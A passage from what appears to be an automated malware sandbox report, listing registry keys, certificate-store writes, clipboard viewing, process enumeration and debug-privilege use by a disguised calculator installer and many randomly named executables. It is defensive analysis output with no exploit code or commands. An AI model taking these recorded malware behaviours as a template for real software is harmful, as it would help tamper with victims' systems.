\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe -
Modifies registry class 5 IoCs
Processes:
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance\ Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ -
Processes:
installer.exeCalculator%20Installation.exeWymobelewa.exedescription ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E Calculator%20Installation.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0400000001000000100000001bfe69d191b71933a372a80fe155e5b50f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e190000000100000010000000ea6089055218053dd01e37e1d806eedf2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd Calculator%20Installation.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 5c000000010000000400000000100000190000000100000010000000ea6089055218053dd01e37e1d806eedf0300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd9796254830400000001000000100000001bfe69d191b71933a372a80fe155e5b52000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd Calculator%20Installation.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 Wymobelewa.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 Wymobelewa.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeMon20d3b8b752.exepid Process 1524 powershell.exe 1524 powershell.exe 1524 powershell.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe 976 Mon20d3b8b752.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
foldershare.exepid Process 3232 1212 foldershare.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
RRLzwWRhJ6iHLobR1jUETLpO.exepid Process 1904 RRLzwWRhJ6iHLobR1jUETLpO.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs
Processes:
msedge.exepid Process 6308 msedge.exe 6308 msedge.exe 6308 msedge.exe 6308 msedge.exe 6308 msedge.exe 6308 msedge.exe 6308 msedge.exe 6308 msedge.exe 6308 msedge.exe 6308 msedge.exe 6308 msedge.exe 6308 msedge.exe 6308 msedge.exe 6308 msedge.exe 6308 msedge.exe 6308 msedge.exe -
Suspicious behavior: SetClipboardViewer 3 IoCs
Processes:
7365935.scr8270222.scr1487741.scrpid Process 5636 7365935.scr 5056 8270222.scr 8124 1487741.scr -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
svchost.exepowershell.exeMon206d48916f93c5.exetaskkill.exe1378103.scrDownFlSetup110.exeWerFault.exeConhost.execYUc7wuTDsuE7h7XbhShNkR8.exeWerFault.exe7406868.scrMon209c830507d573.exeWkcWFH3P8gRGZgykU0ledS3T.exeH86qWBuHzWZmGITuNE3X9SxF.exe2512986.scrsvchost.exetaskkill.exe2303097.scr5472694.scrhQVevJHT7ifZkZy5q0HwRySe.exedescription pid Process Token: SeSystemtimePrivilege 3824 svchost.exe Token: SeSystemtimePrivilege 3824 svchost.exe Token: SeIncBasePriorityPrivilege 3824 svchost.exe Token: SeDebugPrivilege 1524 powershell.exe Token: SeDebugPrivilege 1192 Token: SeDebugPrivilege 3168 Mon206d48916f93c5.exe Token: SeDebugPrivilege 908 taskkill.exe Token: SeDebugPrivilege 3108 1378103.scr Token: SeDebugPrivilege 4692 DownFlSetup110.exe Token: SeRestorePrivilege 5356 WerFault.exe Token: SeBackupPrivilege 5356 WerFault.exe Token: SeDebugPrivilege 5252 Conhost.exe Token: SeRestorePrivilege 5396 cYUc7wuTDsuE7h7XbhShNkR8.exe Token: SeBackupPrivilege 5396 